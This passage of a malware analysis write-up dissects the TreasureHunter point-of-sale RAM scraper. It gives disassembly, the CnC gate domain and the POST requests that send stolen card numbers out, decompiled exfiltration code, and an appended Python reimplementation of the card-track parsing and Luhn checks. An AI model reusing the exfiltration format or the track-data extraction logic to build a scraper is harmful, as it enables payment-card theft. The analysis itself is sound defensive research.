getch();\r\n return 0;\r\n}\r\nCnC 
\u0026 Data exfiltration\r\nTreasureHunter uses HTTP POST requests to contact its CnC and send it the collected credentials. The gate is hardcoded in the binary and the domain is still online and working.\r\n| 0x004014af bb58fd4000 mov ebx, str.x0000m.net_test_local_gate.php ; \"x0000m.net/test/local\r\nThe index page of the website has the following title : \"Mosad - Build by Redo\". We get a 404 if we try to display the gate.php page in our browser, but it still responds to proper malware requests.\r\nFirst, the malware tries to contact its hardcoded gate (x0000m.net) with the following request :\r\nPOST /test/local/gate.php?request=true HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\n[...]\r\nrequest=1a527a9738bdf2\u0026use=J8DfbsnQabc730OkDqaDmaC\u0026id=a18948d649742114cb84de349fe6f1d0\r\n1a527a9738bdf2 is the encrypted value of \"GET_KEYS\", J8DfbsnQabc730OkDqaDmaC is a hardcoded value, probably a campaign identifier, and a18948d649742114cb84de349fe6f1d0 is the product id 
associated with the infected machine.\r\nThe associated function starts @ 0x00401440 :\r\n .----------------------------------------------------\r\n | 0x401867 ;[g]\r\n | push 0\r\n | push 0\r\n | push 0\r\n | push 0\r\n | push ecx\r\n | ; \"POST\" @ 0x410078\r\n | push str.POST ; str.POST\r\n | push edi\r\n | sub esi, edx\r\n | ; sym.imp.WINHTTP.dll_WinHttpOpenRequest\r\n | call dword [sym.imp.WINHTTP.dll_WinHttpOpenRequest]\r\n | push dword [ebp - local_4h]\r\n | mov edi, eax\r\n | call sub.KERNEL32.dll_HeapFree_bdf ;[e]\r\n | add esp, 4\r\n | test edi, edi\r\n | jne 0x401897 ;[f]\r\n `-----------------------------------------------------\r\n t f\r\n .---------------------------------------------------------' '---------------------------------------------\r\n |\r\n |\r\n.---------------------------------------------------------------------------------------------------------------\r\n| 0x401897 ;[f]\r\n| push 0x20000000\r\n| ; '/'\r\n| ; '/'\r\n| push 0x2f\r\n| ; \"Content-Type: application/x-www-form-urlencoded\" @ 0x410088\r\n| push str.Content_Type:_application_x_www_form_urlencoded ; str.Content_Type:_application_x_www_form_urlencoded\r\n| push edi\r\n| ; \"$..\" @ 0x40c194\r\n| call dword [sym.imp.WINHTTP.dll_WinHttpAddRequestHeaders] ;[i]\r\n| test eax, eax\r\n| je 0x40188f ;[h]\r\n`---------------------------------------------------------------------------------------------------------------\r\n f t\r\n '--------------------------.----------------------------------------------------------------------------\r\n |\r\n|\r\n .-----------------------------------------------------------.\r\n | 0x4018ae ;[k] |\r\n | push 0 |\r\n | push esi |\r\n | push esi |\r\n | push dword [ebp + arg_8h] |\r\n | push 0 |\r\n | push 0 |\r\n | push edi |\r\n | ; sym.imp.WINHTTP.dll_WinHttpSendRequest |\r\n | call dword [sym.imp.WINHTTP.dll_WinHttpSendRequest] ;[j] |\r\n | test eax, eax |\r\n | je 0x40188f ;[h] 
|\r\n `-----------------------------------------------------------'\r\n f t\r\n .-' '----------------------------------------------------------------------.\r\n | |\r\n | |\r\n .---------------------------------------------------------------. |\r\n | 0x4018c4 ;[m] | |\r\n | push 0 | |\r\n | push edi | |\r\n | ; UINT uExitCode | |\r\n | ; \"z..\" @ 0x40c184 | |\r\n | call dword [sym.imp.WINHTTP.dll_WinHttpReceiveResponse] ;[l] | |\r\n | test eax, eax | |\r\n | je 0x40188f ;[h] | |\r\n `---------------------------------------------------------------' |\r\n f t |\r\n '-.---------------------------------------------------------------. .-.----'---\r\n | | | |\r\n | | | |\r\n .-----------------------------------------------------------. .------------------\r\n | 0x4018d1 ;[p] | | 0x40188f ;[h]\r\n | ; [0xc:4]=0xffff | | pop edi\r\n | mov edx, dword [ebp + arg_ch] | | xor eax, eax\r\n | mov ecx, edi | | pop esi\r\n | call sub.KERNEL32.dll_ExitProcess_710 ;[n] | | mov esp, ebp\r\n | push edi | | pop ebp\r\n | mov esi, eax | | ret\r\n | ; sym.imp.WINHTTP.dll_WinHttpCloseHandle | `------------------\r\n | call dword [sym.imp.WINHTTP.dll_WinHttpCloseHandle] ;[o] |\r\n | pop edi |\r\n | mov eax, esi |\r\n | pop esi |\r\n | mov esp, ebp |\r\n | pop ebp |\r\n | ret |\r\n `-----------------------------------------------------------'\r\nThen, if the number of PANs found is equal to 0 or \u003e= 50 (value from config), the thread sleeps for 60 seconds (hardcoded value). If it found more than 50 credentials, a POST request is prepared in build_request @ 0x004035A0 to periodically send the encrypted PANs to the gate :\r\nPOST /test/local/gate.php?request=true HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\n[...]\r\nreport=[Encrypted PANs]\u0026id=a18948d649742114cb84de349fe6f1d0\r\nPANs are encrypted with the function @ 0x00402490. 
Finally, the thread sleeps for 180 seconds (value from config) and starts over. Partial pseudocode of the thread_send_PAN routine @ 0x00402AD0 :\r\nvoid __stdcall __noreturn thread_send_PAN(LPVOID lpThreadParameter)\r\n{\r\n while ( 1 )\r\n {\r\n EnterCriticalSection(\u0026CriticalSection);\r\n v1 = dwNbPans;\r\n if ( dwNbPans \u003e 0 )\r\n {\r\n \r\n [...]\r\n \r\n strPAN = sub_402680(v3, (const char *)v57);\r\n encrypted_PAN = encrypt_str(strPAN, (const char *)dwKey, 0, 1);\r\n v37 = (char *)lpOptional;\r\n v38 = 2 * v54;\r\n *(_DWORD *)lpOptional = 'oper';\r\n *((_WORD *)lpOptional + 2) = 'tr';\r\n *((_BYTE *)lpOptional + 6) = '=';\r\n if ( 2 * v54 \u003e 0 )\r\n {\r\n memmove((char *)lpOptional + 7, encrypted_PAN, v38);\r\n v37 = (char *)lpOptional;\r\n }\r\n *(_DWORD *)\u0026v37[v38 + 7] = '=di\u0026';\r\n v39 = (int)\u0026v37[v38];\r\n v40 = lpName;\r\n v41 = 0;\r\n do\r\n {\r\n *(_BYTE *)(v41 + v39 + 11) = v40[v41];\r\n ++v41;\r\n }\r\n while ( v41 \u003c '!' 
);\r\n v42 = send_request(hConnect, dwRepTrue, lpOptional, 7u);\r\n v43 = (char *)v42;\r\n if ( v42 \u0026\u0026 strstr(v42, \"success\") \u0026\u0026 bDebug == 1 )\r\n MessageBoxW(0, L\"successfully sent the dumps!\", L\"Debug Message\", 0);\r\n free((void *)strPAN);\r\n free(encrypted_PAN);\r\n free(v43);\r\n dwNbPans = 0;\r\n }\r\n LeaveCriticalSection(\u0026CriticalSection);\r\n Sleep(dw180000_0);\r\nRecap of TreasureHunter execution flow\r\nHere is a small r2 script you can load (-i script.r2) to rename interesting functions with more informative names :\r\nafn check_luhn @ 0x00403040\r\nafn check_pattern @ 0x004031d0\r\nafn check_service_codes @ 0x00403040\r\nafn parse_track1 @ 0x00403280\r\nafn parse_track2 @ 0x00403320\r\nafn check_pan @ 0x004033a0\r\nafn to_int @ 0x00401260\r\nafn send_request @ 0x00401840\r\nafn derivate_from_productid @ 0x00401F10\r\nafn create_file @ 0x004021A0\r\nafn copy_file @ 0x00402380\r\nafn decrypt_arg @ 0x004023F0\r\nafn encrypt_str @ 0x00402490\r\nafn check_format_b @ 0x00403140\r\nafn build_request @ 0x004035A0\r\nafn search_process_mem @ 0x004038A0\r\nafn search_process @ 0x00403BD0\r\naf @ 0x00403DB0; afn clingfish @ 0x00403DB0\r\nafn copy_to_appdata @ 0x00404120\r\nafn init_malware @ 0x004045F0\r\nafn check_number_PAN @ 0x004028C0\r\naf @ 0x00402AD0; afn thread_send_pan @ 0x00402AD0\r\nSummary of the malware MO :\r\n0x0040523B, start\r\nChecks PE header and gets environment strings\r\n0x004045F0, init_malware\r\nCreates a mutex derived from the system's product ID (or from a hardcoded value)\r\nCopies itself to %APPDATA% and starts a new process with the encrypted path of the original file as a parameter\r\nThe new process decrypts the command line argument and deletes the original file\r\nTries to elevate itself to get debug privileges\r\nTries to reach the CnC gate\r\n0x00401440, load_config\r\nWaits for 10 minutes (value in config)\r\n0x00403BD0, search_process\r\nLists all running 
processes and reads their memory\r\n0x004038A0, search_process_mem\r\nReads process memory and searches for PANs\r\n0x004033A0, check_pan\r\nLooks for track1 / track2 data in memory and hands it to the parsers\r\n0x00403280, parse_track1\r\n0x00403320, parse_track2\r\n0x00403040, check_luhn\r\n0x00401840, send_request\r\nHere are some function calls to give you an idea of the malware's call flow :\r\n[0x004038a0]\u003e s search_process_mem\r\n[0x004038a0]\u003e pds\r\n0x004038a8 call fcn.0040a0f0\r\n0x004038ad \"N.@....D.#A\"\r\n0x004038d1 call dword [sym.imp.KERNEL32.dll_VirtualQueryEx]\r\n0x0040393b call dword [sym.imp.KERNEL32.dll_ReadProcessMemory] \"...\"\r\n0x00403985 call check_pan\r\n[0x004033a0]\u003e pds\r\n0x004033fb call parse_track2\r\n0x00403417 call parse_track1\r\n0x00403433 call sub.KERNEL32.dll_EnterCriticalSection_8c0\r\n[0x004033a0]\u003e s parse_track2\r\n[0x00403320]\u003e pds\r\n0x00403331 call check_luhn\r\n0x00403352 call check_format_b\r\n0x00403363 call check_pattern\r\n0x00403377 call fcn.00403250\r\n[0x00403280]\u003e pds\r\n0x0040328e call check_luhn\r\n0x004032d8 call check_format_b\r\n0x004032e9 call check_pattern\r\n0x004032fa call fcn.00403250\r\n[0x00403140]\u003e s check_pattern\r\n[0x004031d0]\u003e pds\r\n0x00403209 call check_service_codes\r\nSource: http://adelmas.com/blog/treasurehunter.php",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"http://adelmas.com/blog/treasurehunter.php"
	],
	"report_names": [
		"treasurehunter.php"
	],
	"threat_actors": [],
	"ts_created_at": 1775433976,
	"ts_updated_at": 1775826716,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1475ab1536f3abf5cc9a55044958a27305ffac2d.pdf",
		"text": "https://archive.orkl.eu/1475ab1536f3abf5cc9a55044958a27305ffac2d.txt",
		"img": "https://archive.orkl.eu/1475ab1536f3abf5cc9a55044958a27305ffac2d.jpg"
	}
}
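The part of the write-up above that a defender can most usefully reproduce is the validation chain applied to each candidate pulled out of ReadProcessMemory output (check_luhn, check_format_b, check_pattern, check_service_codes, parse_track1, parse_track2): the same checks decide whether a memory-scanning detection fires on real card data or on noise. The code below is an added example written for this page, not the blog author's code and not the malware's: it scans a constructed byte buffer standing in for a dumped process region, parses ISO/IEC 7813 track 1 and track 2 candidates, and applies Luhn, expiry-month and service-code plausibility checks. The regular expressions, the accepted service-code digits and the expiry check are assumptions about a sane validator; the write-up does not state which patterns or codes the sample accepts, and neither the encryption routine @ 0x00402490 nor the gate request are reproduced.

```python
"""PAN validation chain of a RAM scraper, reimplemented for illustration.

Added example, not the TreasureHunter code: it mirrors the stages the write-up
names (Luhn, format code B, track pattern, service code) over a constructed
byte buffer that stands in for a region returned by ReadProcessMemory.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# ISO/IEC 7813 track layouts (assumption: the sample's exact patterns are not
# given in the write-up).  Track 2: ;PAN=YYMM SSS discretionary?
# Track 1: %B PAN ^ NAME ^ YYMM SSS discretionary?  (format code B enforced here)
TRACK2_RE = re.compile(rb';(\d{13,19})=(\d{4})(\d{3})(\d*)\?')
TRACK1_RE = re.compile(rb'%B(\d{13,19})\^([^^]{2,26})\^(\d{4})(\d{3})([^?]*)\?')

# Service code digits defined by ISO/IEC 7813 (assumption: a plausible
# check_service_codes; the write-up does not list the values the sample accepts).
SVC_INTERCHANGE = set('125679')   # 1st digit: interchange / chip hints, 9 = test
SVC_AUTHORIZATION = set('024')    # 2nd digit: authorization processing
SVC_SERVICES = set('01234567')    # 3rd digit: allowed services / PIN rules


def luhn_ok(pan: str) -> bool:
    """Luhn mod-10 check over the PAN digits (the check digit is the last one)."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:          # every second digit from the right is doubled
            d = d * 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def reject_reason(pan: str, expiry_yymm: str, service_code: str) -> Optional[str]:
    """Return why a candidate is rejected, or None if it passes every stage.

    Order follows the call chain in the write-up: Luhn first, then the
    format/pattern checks, so noise that merely looks like a track never
    reaches the collection buffer.
    """
    if not luhn_ok(pan):
        return 'luhn'
    month = int(expiry_yymm[2:])
    if not 1 <= month <= 12:      # assumption: reject impossible expiry months
        return 'expiry'
    if (service_code[0] not in SVC_INTERCHANGE
            or service_code[1] not in SVC_AUTHORIZATION
            or service_code[2] not in SVC_SERVICES):
        return 'service_code'
    return None


@dataclass
class Card:
    pan: str
    expiry_yymm: str
    service_code: str
    track: int
    offset: int
    name: Optional[str] = None

    def masked(self) -> str:
        """First six and last four digits only, for the logs a defender keeps."""
        return self.pan[:6] + '*' * (len(self.pan) - 10) + self.pan[-4:]


def scan_memory(buf: bytes) -> List[Card]:
    """Find validated track 1 / track 2 records in a dumped memory region."""
    found: List[Card] = []
    for m in TRACK2_RE.finditer(buf):
        pan, exp, svc = (m.group(i).decode('ascii') for i in (1, 2, 3))
        if reject_reason(pan, exp, svc) is None:
            found.append(Card(pan, exp, svc, 2, m.start()))
    for m in TRACK1_RE.finditer(buf):
        pan, exp, svc = (m.group(i).decode('ascii') for i in (1, 3, 4))
        name = m.group(2).decode('ascii', 'replace')
        if reject_reason(pan, exp, svc) is None:
            found.append(Card(pan, exp, svc, 1, m.start(), name))
    found.sort(key=lambda c: c.offset)   # report in memory order
    return found


def unique_pans(cards: List[Card]) -> int:
    """Distinct PANs collected (the role the dwNbPans counter plays in the write-up)."""
    return len({c.pan for c in cards})


# Constructed stand-in for a process region; not captured from a real POS host.
# PANs are public test numbers (Luhn-valid unless noted).
SAMPLE_MEMORY = (
    b'\x00\x00\x00POSAPP.EXE\x00'
    b';4111111111111111=2512101123456789?'            # valid track 2
    b'\x90\x90\x90\x00'
    b';4111111111111112=2512101123456789?'            # fails Luhn (last digit off by one)
    b'\x00'
    b'%B5555555555554444^DOE/JOHN^2512101000000000?'  # valid track 1, format code B
    b'\x00\x00'
    b';4012888888881881=9913101?'                      # Luhn ok, expiry month 13
    b';4222222222222=2512301?'                         # Luhn ok, undefined 3xx service code
)

if __name__ == '__main__':
    cards = scan_memory(SAMPLE_MEMORY)
    for c in cards:
        print(f'track{c.track} @+{c.offset}: {c.masked()} exp={c.expiry_yymm} '
              f'svc={c.service_code} name={c.name}')
    print(f'{unique_pans(cards)} distinct PAN(s)')
```

Run stand-alone it reports the two candidates that survive every stage and masks them; the three rejected candidates show why a scanner that only pattern-matches for digit runs is noisy, and why the malware bothers with Luhn and service-code checks before counting a hit.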